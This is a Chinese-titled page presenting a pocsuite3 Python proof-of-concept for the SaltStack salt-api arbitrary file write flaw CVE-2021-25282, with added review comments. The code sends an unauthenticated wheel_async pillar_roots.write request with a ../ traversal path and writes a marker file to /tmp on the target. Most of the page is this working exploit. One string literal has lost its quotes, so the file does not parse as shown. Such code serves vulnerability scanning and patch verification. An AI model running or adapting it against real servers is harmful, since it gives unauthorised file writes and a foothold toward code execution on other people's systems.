Saltstack 任意文件寫入漏洞(CVE-2021-25282)



POC

#!/usr/bin/env python
# coding: utf-8

from urllib.parse import urlparse from pocsuite3.api import requests as req from pocsuite3.api import register_poc from pocsuite3.api import Output, POCBase from pocsuite3.api import POC_CATEGORY, VUL_TYPE import re import json


class TestPOC(POCBase):
   """pocsuite3 plugin that checks a salt-api endpoint for CVE-2021-25282.

   The check sends a single POST to ``/run`` with no username or password,
   selecting the ``wheel_async`` client and the ``pillar_roots.write``
   function with a ``../``-prefixed path, and reports the host as affected
   when the reply acknowledges a ``salt/wheel`` job. It never reads the file
   back, so a positive result means "the API accepted the write job", not a
   confirmed write on disk. The attribute block below is pocsuite3 plugin
   metadata; the author lists versions ``< 3002.5`` as affected, which is
   the range a defender would want to upgrade out of (or at minimum keep
   salt-api off untrusted networks).
   """

   vulID = '000'
   version = '1'
   author = 'zhzyker'
   vulDate = '2021-02-27'
   createDate = '2021-03-02'
   updateDate = '2021-03-02'
   references = ['https://github.com/zhzyker/vulmap']
   name = 'SaltStack Arbitrary file writing vulnerability(CVE-2021-25282)'
   appName = 'SaltStack'
   appVersion = '< 3002.5'
   vulType = VUL_TYPE.CODE_EXECUTION
   category = POC_CATEGORY.EXPLOITS.REMOTE
   # NOTE(review): this is a multi-line string literal in the original
   # source; the triple-quote delimiters were dropped by the wiki rendering,
   # so as shown here the assignment has no value and the block does not
   # parse as-is.
   desc = 
       Unauthorized access to wheel_async, arbitrary code/commands can be executed through salt-api.
   


   def _verify(self) -> Output:
       """Probe the configured target and return a pocsuite3 Output.

       Only the port embedded in ``self.url`` is tried; when the URL carries
       none, 8000 (the port the author assumes for salt-api) is the single
       fallback. Every failure on a port — connection or TLS error, non-JSON
       body, missing keys — is swallowed and reads as "not vulnerable".
       """
       result = {}
       pr = urlparse(self.url)
       if pr.port:
           ports = [pr.port]
       else:
           ports = [8000]
       for port in ports:
           target = '{}://{}:{}'.format(pr.scheme, pr.hostname, port)
           TIMEOUT = 10  # seconds; applies to the one POST issued per port
            
           url = target + "/run"
           # Path argument handed to pillar_roots.write: it climbs out of
           # the pillar root with ../ segments. How the server resolves it is
           # the substance of the CVE (presumably relative to the configured
           # pillar root — not verifiable from this side).
           path = "../../../../../../../../../tmp/vuln"
           # Static browser-like User-Agent plus a JSON content type.
           headers = {
               'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36',
               'Content-Type': 'application/json'
               }
           # No credentials are included: 'eauth: auto' together with the
           # async wheel client is the request shape the affected versions
           # let through without authenticating (see desc above). 'data' is
           # the only content written; the file name is the marker.
           data = {
               'eauth': 'auto',
               'client': 'wheel_async',
               'fun': 'pillar_roots.write',
               'data': 'vuln_cve_2021_25282',
               'path': path
           }
            
           data = json.dumps(data)
           try:
               # TLS certificate verification is disabled for this request.
               r = req.post(url, headers=headers, data=data, timeout=TIMEOUT, verify=False)
               # print(r.text)
               # Expected reply shape: {"return": [{"tag": ..., "jid": ...}]}.
               # The body is parsed twice here rather than once.
               tag = list(json.loads(r.text)["return"])[0]["tag"]
               jid = list(json.loads(r.text)["return"])[0]["jid"]
               # A wheel event tag that embeds the job id is taken as the job
               # having been queued; the target file is never inspected.
               if r"salt/wheel" in tag:
                   if jid in tag:
                       result['VerifyInfo'] = {}
                       result['VerifyInfo']['URL'] = url
                       result['VerifyInfo']['JID'] = jid
                       result['VerifyInfo']['UPLOAD'] = path
                       break
           except:
               # Bare except: network, TLS, JSON and key errors all count as
               # "not vulnerable" on this port and are never surfaced or
               # logged, so a misconfigured scan is indistinguishable from a
               # patched host.
               pass
       return self.parse_output(result)
   def _attack(self) -> Output:
       """Attack mode is the same request as verification; the probe already
       issues the write request, so there is no separate attack step."""
       return self._verify()
   def parse_output(self, result: dict) -> Output:
       """Wrap ``result`` in a pocsuite3 Output: success when non-empty,
       otherwise a fail record with the author's message."""
       output = Output(self)
       if result:
           output.success(result)
       else:
           output.fail('not vulnerability')
       return output

# Plugin entry point: hands the class to pocsuite3's registry so the framework
# can discover and run it. This registration is the module's only top-level
# side effect visible here.
register_poc(TestPOC)


版權信息

POC由【之乎者也】提供。